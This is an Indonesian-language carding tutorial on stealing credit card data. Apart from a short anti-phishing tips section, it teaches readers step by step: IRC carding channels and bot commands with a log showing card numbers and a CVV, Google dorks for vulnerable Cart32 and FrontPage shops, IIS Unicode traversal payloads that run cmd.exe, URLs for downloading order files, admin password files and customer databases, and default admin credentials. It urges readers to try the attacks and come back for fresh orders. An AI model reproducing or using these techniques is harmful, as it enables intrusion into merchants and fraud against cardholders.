SCAM PAGE (HALAMAN SITUS PALSU)
Berhubung
saya membahas mengenai Phising, sekalian saja saya tambahkan secuil informasi
yang hampir mirip dengan kasus phising. Teknik ini adalah cara yang dilakukan
carder untuk mendapatkan informasi kartu kredit dengan cara membuat sebuah
halaman situs konfirmasi palsu yang lebih dikenal dengan julukan SCAM PAGE.
Contohnya adalah Yahoo Wallet
yang diberikan oleh Yahoo untuk pengadaan kartu kredit. Jadi apabila user
berbelanja dengan situs Yahoo maka proses verifikasinya hanya sedikit saja,
misalnya cukup dengan memasukkan CVV kartu kredit yang dimiliki user.
Biasanya carder akan bertindak seolah-olah administrator Yahoo, lalu
menyampaikan pesan kepada user dengan alasan perubahan data. Untuk
melakukannya, klik pada link yang sudah disediakan. Apabila seseorang mengklik
link yang dimaksud, user bukannya dibawa menuju ke situs resmi Yahoo, melainkan
ke sebuah area registrasi yang mirip dengan kepunyaan Yahoo.
Apabila user yang telah tertipu tersebut memasukkan data, dan mengklik submit,
maka data tersebut akan dikirimkan kepada email carder, bukannya masuk ke dalam
database Yahoo.
Berikut ini adalah contoh sebuah halaman scam page www.aol-customerservice.com
yang dulu pernah ada.
Jika dilihat
teknik seperti ini cukup rumit, sehingga carder yang memahami pemrograman web
yang bisa membuat halaman palsu registry seperti itu. Walau demikian, scam page
sangat berbahaya hasilnya karena bisa dibuat untuk memperoleh semua informasi
detail dari user. Dan bisa juga diterapkan untuk banyak hal
"perampokan" data lainnya.
SECURITY TIPS
Hal yang paling sederhana dan perlu Anda lakukan
adalah mengecek dengan benar nama situs yang Anda buka. Jika Anda menerima
email dari bank, sebaiknya Anda memeriksa keabsahan email tersebut apakah benar
dari bank atau bukan. Sebisa mungkin segera hubungi bank tersebut, apakah email
yang dimaksud benar atau tidak.
Sepengetahuan saya, bank tidak pernah meminta nasabahnya untuk melakukan update
data apalagi melalui email. Kalau toh memang ada, biasanya Anda diminta
menghubungi pihak bank dengan nomor yang jelas. Jadi, Anda jangan sampai
memberikan data-data pribadi apalagi data-data keuangan seperti nomor kartu
kredit secara sembarangan. Hal ini telah disampaikan secara resmi oleh Visa
pada http://corporate.visa.com/ut/fraud.jsp
"Visa will never send you an email asking for confidential information
such as account numbers, passwords, PIN numbers, credit card numbers or social
security numbers."
Jangan lupa untuk memeriksa kegiatan
transaksi perbankan Anda. Supaya tindakan pencegahan dan pengobatan bisa segera
ditangani. Berhubung, kebanyakan email yang digunakan adalah spam maka Anda
wajib memfilter email yang masuk.
Jika bisa, Anda dapat memeriksa sertifikat digital situs tersebut. Selain
dengan memeriksa sertifikat digital sebuah situs, pada situs resmi, yang
memiliki logo VeriSign Secure Site. Pastilah Anda bisa memeriksa keabsahannya,
karena memiliki tombol dengan pesan Click to verify.
Intinya adalah, kita harus selalu berhati-hati. Apalagi saat ini aktivitas
phising terus meningkat setiap harinya. Bahkan situs yang ngakunya aman, belum
tentu aman 100%.
CHATTING
Sebenarnya ini hanyalah sebuah aktivitas chatting biasa
saja. Hanya saja di sini ada beberapa channel yang biasanya adalah sebuah
komunitas yang membicarakan tema carding. Cara seperti ini pula yang digunakan
untuk memperoleh nomor kartu kredit tanpa perlu repot-repot. Cukup dengan masuk
ke dalam channel khusus tersebut maka seseorang akan bisa memperoleh nomor
kartu kredit dengan mudah. Ada banyak channel, hanya saja disini saya berikan
beberapa saja yang pernah saya ketahui:
#ccposts
#thecc
#thacc
#cvv
#cc
#ccs
#cchome
#cvv2
Anda dapat mengunjungi
channel-channel tersebut melalui server IRC umum yang banyak digunakan oleh
orang, diantaranya DALnet, UnderNet dan Efnet.
Data dan nomor mengenai kartu kredit itu bisa diminta (request) dengan gratis
pada channel-channel tersebut.
Dalam channel tersebut bisa juga menggunakan command (perintah) tertentu untuk
mendukung aktivitas carding.
Command: !cc digunakan untuk merequest (meminta) nomor kartu kredit.
Command: !chk digunakan untuk mengecek valid tidaknya nomor yang diperoleh.
Contoh:
!chk1111222233335555
Command !cvv2 digunakan untuk mendapatkan CVV dari nomor kartu kredit yang
dimiliki.
Command !order.log digunakan untuk data dari nomor kartu kredit. Seperti, nama
alamat dan sebagainya.
Command !proxy digunakan untuk mengetahui nomor port dan proxy yang bisa
digunakan untuk menyembunyikan diri.
Di samping itu pula,
untuk mendapatkan nomor kartu kredit bisa dilakukan dengan cara trade atau
orang umumnya menyebutnya "barter". Penukaran tersebut bisa berupa
apa saja, baik sesama nomor kartu kredit. Bisa pula objek-objek lainnya,
misalnya adalah shell account, root, bnc, psybnc, domain, password, dan proxy.
Sebenarnya, saya tidak begitu tertarik dengan pembahasan chatting ini, sebab
saya sendiri jarang sekali melakukan aktivitas chatting ini. Jadi saya beri
sedikit cuplikan saja.
#ccposts
**Now talking in #ccposts
** Topic is '..:: Welcome To #CCPOSTS | !Chk [OFF] !Commands [ON] !Cvv2 [ON]
Also Idle In
#Dont.whois.me.b***h and get Aop | 0/ v Verify First| /server xdirc.d2g.com
-> Free BNC:/server portatech.net 21500 xdirc'
** Set by ^XDIrc^ on Thu May 09 02:04:28
-CCard-Chk-Bot- Tired Of Using Dalnet For Checking CC'S? Try X-Niates 5.01 --
http://mi5.ausgamers.com/xns501.exe (win ME untested & 24 Valid CC's
Included) !cvv2
5437000105070603 !commands
** Quits: MIHUTESCU (~mihut@80.97.26.67)
(Client closed connection) Er0sake',< 5437000405070603 > is Master >
cvv2 : -> 074 <-,
by: SL[at]TkiS, #DaCc
-listen2rap- SL[a]TkiS's command list is as following:
!country Country-Name, !state State-Name, !bank cc-Number, !bnc, !order.log,
!cardable, !proxy, !unicode, !cvv2ccNumber _ _=. SL[a]TkiS addon version 4.0,
get it at
www.sthost4u.net/Programs/slatkis_addon_4.0.zip,
#DaCc =_ <@^Enhance^> << <> >> ? <
Merchant Account - I have Virgin / Cvv2 / eBay Seller Accounts / Proxy / XXX /
Cardable Sites / High Limit CCs --| Ver. First. NewBs & Ripperz Piss Off
>><>
* I have cc number and I need cc msg me for trade !chk 3732 1694 2923 0058
Kali
ini saya akan mengulas teknik carding pada salah satu aplikasi belanja yang
sering digunakan internet yaitu cart32. Ini sebenarnya adalah teknik carding
yang sudah umum.
Ada beberapa syntax yang boleh Anda coba sendiri yang mungkin Anda sukai. Ingat
langkah-langkah seperti ini memerlukan bantuan Google Hacking. Caranya masuk
saja ke www.google.com , kemudian pada kolom search ketiklah syntax berikut:
allinurl: cgi-bin/cart32.exe
atau
cgis/cart32.exe
allinurl:/cart32.exe/
Secara pribadi saya lebih
menyukai syntax yang terakhir yaitu: allinurl:/cart32.exe/
Harap diperhatikan sewaktu Anda melakukan searching di google.com sebab bisa
saja model yang Anda peroleh berbeda teksnya. Atau malah versi cart yang
berbeda seperti Cart32v3.2 atau yang lainnya.
Potonglah website tersebut menjadi seperti contoh berikut atau berakhiran
dengan kata-kata cart32.exe.
http://www.situs-target.com/partybows/cgi-bin/cart32.exe/
Tambahkan kata error pada akhirnya. Jadi, secara lengkap dapat ditulis menjadi:
http://www.situs-target.com/partybows/cgi-bin/cart32.exe/error
Kode lain yang bisa Anda gunakan adalah expdate.
Copy link yang telah Anda modifikasi tersebut pada URL browser Anda, dan
jalankan.
Apabila yang muncul adalah halaman error maka beruntunglah Anda. Karena tujuan
kita memang untuk melihat yang error-error. Hanya saja, di sini ada dua jenis
error, ada error yang berguna dan ada juga yang tidak berguna. Berikut adalah
halaman error yang tidak berguna. Jadi Anda cari website lainnya saja, biar
gampang.
Sedangkan halaman error yang kita cari adalah yang memberikan informasi lebih
lengkap. Contohnya adalah yang berisikan informasi CGI.
Dari informasi tersebut, carilah bagian Page Setup and Directory, pada beberapa
kasus namanya adalah Cart32 Setup Info and Directory. Pada bagian tersebut,
carilah file yang memiliki ekstensi *.32.
Misalnya, di sini saya menemukan beberapa diantaranya adalah:
CABLE-010018.c32
CABLE-010019.c32
CABLE-010020.c32
CABLE-010021.c32
CABLE-010022.c32
CABLE-010023.c32
CABLE-010024.c32
CABLE-010025.c32
CABLE-010026.c32
CABLE-010027.c32
CABLE-010028.c32
Aksi berikutnya adalah merubah bentuk URL.
http://www.situs-target.com/partybows/cgi-bin/cart32.exe/error
Dengan menghapus error dan juga .exe, maka URLnya menjadi:
http://www.situs-target.com/partybows/cgi-bin/cart32
Masukkanlah nama file *.32 yang Anda temukan pada akhir URL menjadi:
http://www.situs-target.com/partybows/cgi-bin/cart32/nama-file.32
Contohnya:
http://www.situs-target.com/partybows/cgi-bin/cart32/CABLE-010018.c32
Berikut ini adalah petunjuk lainnya dengan model yang berbeda. Caranya hampir
sama dengan yang sebelumnya.
http://www.situs-target.com/scr i pts/cart32.exe/folder-lainnya
Ubah URL tersebut menjadi:
http://www.situs-target.com/scr i pts/
Di belakang scr i pt akan kita beri beberapa unicode. Maka bentuknya menjadi:
http://www.situs-target.com/scr i pts/
Berikut daftar unicode yang bisa Anda selipkan untuk dijajal.
Untuk URL dengan yang terdapat path/scr i pts/ :
/scr i pts/%c1%9c/winnt/system32/cmd.exe?/c dir c:\
/scr i pts/..%c0%af../winnt/system32/cmd.exe?/c dir c:\
/scr i pts/..%255c..%255cwinnt/system32/cmd.exe?/c dir c:\
/scr i pts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c dir c:\
/scr i pts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c dir
c:\
/scr i
pts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c
dir c:\
/scr i pts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c
dir c:\
Sedangkan untuk URL yang terdapat path/cgi-bin/unicode yang digunakan adalah:
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c dir c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c
dir c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c
dir c:\
Sebagai contoh, untuk path /scr i pts/ gantilah menjadi:
http://www.situs-target.com/scr i pts/%c1%9c/winnt/system32/cmd.exe?/c dir c:\
String dir c:\ tujuannya adalah untuk me-list direktori c server situs-target.
Sekarang untuk menuju direktori cc ganti unicodenya menjadi:
http://www.situs-target.com/scr i pts/%c1%9c/winnt/system32/cmd.exe?/c dir
c:\progra~1\mwainc\cart32\
Sekarang output list dari file .32, misalnya saja namanya adalah
WRBURNS-001065.c32
http://www.situs-target.com/scr i pts/%c1%9c/winnt/system32/cmd.exe?/c dir
c:\progra~1\mwainc\cart32\WRBURNS-001065.c32
Berhubung semua ini memerlukan
kesabaran. Seandainya tidak berhasil, mau tidak mau Anda harus mencoba
menggunakan unicode lainnya.
Sekarang, kita akan melakukan sebuah manuver lain dalam memanipulasi Cart32.
Cari di google situs target yang memiliki atau menggunakan Cart32.exe.
Misalkan, di sini saya memperoleh target dengan nama
http://www.situs-target.com
Pura-puralah Anda berbelanja dengan membeli satu item. Setelah berbelanja,
secara otomatis nama website tersebut akan berubah menjadi:
https://www.cart32hosting.com/situs-target/cgi-bin/cart32.exe/DONS-AddItem
Perlu saya tambahkan bahwa
mungkin saja situs cart32hosting.com akan berbeda namanya pada situs target
lainnya. Begitu juga pada akhir link. Gantilah akhiran pada URL dengan kata
error jadinya adalah:
https://www.cart32hosting.com/situs-target/cgi-bin/cart32.exe/error
Pesan kesalahan akan muncul, bentuk dan modelnya, kemungkinan juga berbeda.
Pada kesempatan ini, saya akan
mengajarkan cara menculik password adminnya. Caranya hanya dengan mengubah cart32.exe
menjadi cart32.ini.
https://www.cart32hosting.com/bugsandbuggies/cgi-bin/cart32.ini
Sekarang Anda tinggal mendownload file ini.
Password dalam file
tersebut masih dalam keadaan terenkripsi. Untuk mengenkripsinya, Anda dapat
menggunakan Cart32decoder. Sorry banget, saya tidak akan membahas caranya.
Sebagai bahan percobaan untuk Anda, berikut adalah beberapa direktori yang
memiliki vulnerability tepatnya Exploitable Directories.
/scr i pts/cart32.ini
/scr i pts/cart32.exe
/scr i pts/cart32.exe/cart32clientlist
/scr i pts/c32web.exe/ChangeAdminPassword
/scr i pts/c32web.exe
cgi-shl/c32web.exe/
Berikut saya akan menjelaskan beberapa eksploit yang menarik dan layak untuk
Anda coba. Misalnya dengan menggunakan syntax:
cart32.exe v3
Setelah Anda menemukan target, sebagai bekal bagi Anda, berikut ini adalah
beberapa versi Cart32.exe yang perlu Anda perhatikan, apakah memiliki
vulnerability atau tidak.
v2.5 Sangat bisa
v3.0 Ya, Lumayan
v3.5a Ya, Lumayan bisa
v4.0 Sayang sekali tidak bisa
Sebenarnya, Anda juga bisa menemukan link:
http://www.situs-target.com/cgi-bin/cart32.exe/terserah-ada-apa-saja-????
Biar cepat, langsung saja saya tampilkan teknik eksploitnya:
Untuk mendapatkan nomor kartu kredit:
http://www.situs-target.com/cgi-bin/cart32/apa-saja-ORDERS.txt
atau
http://www.whatever.com/cgi-bin/cart32/apa-saja-OUTPUT.txt
Untuk mendapatkan Password Admin.
http://www.situs-target.com/cgi-bin/cart32.ini
Untuk mendapatkan Password Klien.
http://www.situs-target.com/cgi-bin/cart32.exe/cart32clientlist
Untuk menampilkan Direktori Komputer
http://www.situs-target.com/cgi-bin/cart32.exe/error
Setelah berhasil mendapatkan nomor kartu kredit, biasanya carder akan kembali
lagi minggu depan atau bulan depannya untuk mendapatkan lagi file orders.txt
dengan data terbaru. Begitulah caranya.
CARDING IN DATABASE
Carding-in
database memiliki dua makna.
Yang pertama adalah "Cardingin Database".
Sedangkan yang kedua bisa berarti "Carding in (dalam) database".
Mulai saat ini dan
seterusnya, Anda akan menemukan teknik carding yang ternyata bisa dilakukan
dengan begitu sederhana. Anda tidak perlu mengerti proses enkripsi mencuri
password terlebih dahulu untuk bisa masuk ke sebuah situs. Dalam bab ini Anda
akan mempelajari beberapa teknik yang langsung mengakses database.
Berikut ini saya
berikan sebuah teknik yang bisa digunakan untuk proses carding. Anda tidak
memerlukan tools, untuk melakukan hal ini. Hanya bermodalkan sebuah browser,
dan membuka situs Google.
Vsproducts.mdb
Sebenarnya kalau boleh dibilang teknik ini sudah lama dan kuno. Tapi, sampai
saat ini masih banyak yang bisa dicardingin. Semua itu tergantung dari
kreativitas Anda.
File database yang akan dicolong adalah vsproducts.md. File ini merupakan
bawaan template shopping cart ASP yang diterapkan pada sistem Microsoft
Frontpage. Bagi Anda yang beruntung juga bisa menemukan nomor kartu kredit yang
tidak dienkripsi. Sebab enkripsi itu sendiri bersifat optional, jadi tidak
bawaan langsung, sehingga bisa langsung tampil.
Kode untuk menghubungkan database dengan file database yang digunakan adalah
sebagai berikut:
sDSN="Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=<%=server.mappath("vsproducts.mdb")%>;"
Sebenarnya, situs yang menerapkan model seperti ini, memiliki file test
(percobaan):
http://www.situs-target.com/fpdb/test.asp
Saya harap dari
penjelasan ini, pikiran negatif Anda sudah bisa bangun. Jadi, apabila Anda
tidak menemukan file vsproducts.mdb langsung dari hasil searching namun
menemukan link seperti di atas, patut Anda curigai. Sebab kemungkinan besar
mengandung file vsproducts.mdb.
Biasanya, pesan yang muncul saat melakukan test tersebut adalah:
sDSN="Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=C:\web\database\vsproducts.mdb;"
Apabila file yang Anda jalankan adalah:
db_con_open.asp maka pesan yang muncul adalah:
<%
DIM sDSN
sDSN="Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=C:\web\database\vsproducts.mdb;"
%>
Cukup sedikit saja teorinya, kita segera saja membahas poin berikutnya. Pada bagian
query Google Anda masukkan syntax:
allinurl:proddetail.asp?prod=
Sekarang Anda buka hasil searching Google tersebut, satu per satu.
Misalnya, nama situs target yang saya peroleh adalah
http://www.situs-target.com/store/proddetail.asp?prod=10001G
Saya ubah URL-nya menjadi:
http://www.situs-target.com/store/fpdb/vsproducts.mdb
Efek sampingnya adalah Anda
bisa mendownload file database secara langsung.
Dari kota dialog download tersebut klik tombol Save untuk menyimpan file
database yang Anda dapatkan.
Dalam kotak dialog Save As simpan file tersebut dengan mengklik kembali tombol
Save.
Tunggulah proses download dilakukan sampai selesai. Setelah selesai, klik
tombol Open untuk membuka dengan aplikasi MS.Access.
Perhatikan pada hasil target yang Anda peroleh, tampak bahwa data kartu kredit
ada pada tabel Orders. Tiap hasil yang Anda peroleh bisa berbeda antara situs
yang satu dengan situs yang lain.
Selain itu, kita juga akan
memperoleh nama administrator beserta passwordnya pada bagian Admin.
Nah, Anda sudah mendapatkan satu database pertama.
Sebagai tambahan untuk penjelasan bagian ini, saya harap Anda bisa
mempermainkan folder atau directory yang terdapat di dalamnya. Masalah
mempermainkan folder ini termasuk dalam bagian ilmu Google Hacking atau Google
Dorks. Pada kesempatan ini cukup saya jelaskan sekilas saja.
Misalnya Anda mendapat target:
http://www.situs-target.com/store/proddetail.asp?prod=10001G
Ubah URL-nya menjadi:
http://www.situs-target.com/store/fpdb/vsproducts.mdb
http://www.situs-target.com/fpdb/vsproducts.mdb
http://www.situs-target.com/store/vsproducts.mdb
http://www.situs-target.com/vsproducts.mdb
Tujuannya adalah untuk
menemukan dimana letak file database disembunyikan.
Proses kreatif lainnya yang perlu Anda pahami adalah mengira-ngira nama file
yang mirip. Hal ini sengaja saya jelaskan pada bagian awal. Sebab, jika
nanti-nanti Anda sedang mencoba beraksi ternyata tidak berhasil, maka Anda
harus memahami bagian ini, karena saya tidak akan menjelaskan lagi pada bagian
berikutnya.
Contohnya begini, saya ambil
dari kasus di atas, nama file database-nya adalah: vsproducts.mdb. Kira-kira
yang mirip adalah file vsproduct.mdb (tanpa huruf s). Atau mungkin saja
vspproducts.mdb, vspproduct.mdb, pokoknya pintar-pintar Anda-lah.
Walaupun hal ini kelihatannya sepele, sebenarnya dari banyak kejadian yang saya
temukan banyak yang berhasil. Hal ini terjadi karena untuk mengamankan sebuah
sistem, sering nama file database disamarkan, dan biasanya pula namanya hampir
mirip-mirip. Contoh lainnya, ada tulisan orders, ada juga order. Bahkan
beberapa kasus bersifat case sensitive, jadi apabila Anda mengetikkan Credit
Card akan dianggap berbeda dibanding mengetikkan credit card.
Itulah dua poin penting yang perlu Anda pahami, supaya hasil target Anda
menjadi lebih banyak. Tentu saja semua itu butuh kesabaran dan kreativitas.
Sebagai bonus dari saya untuk bagian ini, adalah berikut halaman loginnya:
http://www.situs-target.com/vsadmin/admin.asp
dengan account dan password default adalah mystore dan changeme.
Seandainya Anda tidak bisa masuk dengan password default, Anda tetap masih bisa
masuk menggunakan account dan password dan file database yang Anda peroleh.
|